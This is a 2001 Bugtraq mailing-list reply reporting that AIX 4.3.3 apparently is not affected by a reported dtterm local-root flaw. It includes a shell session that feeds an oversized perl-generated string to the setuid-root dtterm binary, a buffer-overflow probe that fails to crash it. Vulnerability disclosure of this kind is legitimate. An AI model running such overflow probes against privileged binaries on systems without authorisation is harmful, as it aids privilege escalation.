[22795] in bugtraq
Re: OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (Scott J)
Thu Oct 4 19:42:51 2001
Message-ID: <20011004142339.62461.qmail@web12107.mail.yahoo.com>
Date: Thu, 4 Oct 2001 07:23:39 -0700 (PDT)
From: Scott J <mrbinary@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
For whatever reason, it seems that AIX may not be
vulnerable. This test was performed on a stinky old E30
133 MHz RS/6000, 512 MB "server" (more like a workstation
now, and a wimpy one at that). But it's the only
thing I could get my hands on to try this exploit(?). I was
unable to get dtterm to segfault.
This is AIX 4.3.3 with maintenance level of at least 6
applied, more likely 7 or 8.
It's a uniprocessor box: lslpp -ha bos.up returns 4.3.3.26
applied & committed.
Apologies to Bugtraqqers, I don't have time to try out the
entire dt suite o' crap at the moment with
the problems that have just cropped up. See details below.
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ date
date
Thu Oct 4 08:58:33 EDT 2001
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ uname -a
uname -a
AIX ourhost01 3 4 00299A86C000
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23462'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23462'`
ksh: /usr/dt/bin/dtterm: arg list too long
myuserid@ourhost01.fq.dn [/home/net/myuserid] [126]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ ls -al core
ls -al core
core not found
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ ls -al core
ls -al core
core not found
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
/usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'`
myuserid@ourhost01.fq.dn [/home/net/myuserid] [0]
$ ls -al core
ls -al core
core not found
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$
myuserid@ourhost01.fq.dn [/home/net/myuserid] [2]
$ ls -al /usr/dt/bin/dtterm
ls -al /usr/dt/bin/dtterm
-r-sr-xr-x 1 root bin 40756 Jul 13 1999 /usr/dt/bin/dtterm
Goodbye, and may the road rise with you.